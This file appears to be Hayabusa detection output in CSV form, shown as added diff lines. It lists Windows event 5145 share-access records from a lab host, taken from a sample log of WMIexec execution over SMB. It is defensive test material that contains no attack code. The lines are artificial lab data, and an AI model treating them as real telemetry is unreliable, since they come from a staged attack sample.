+2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
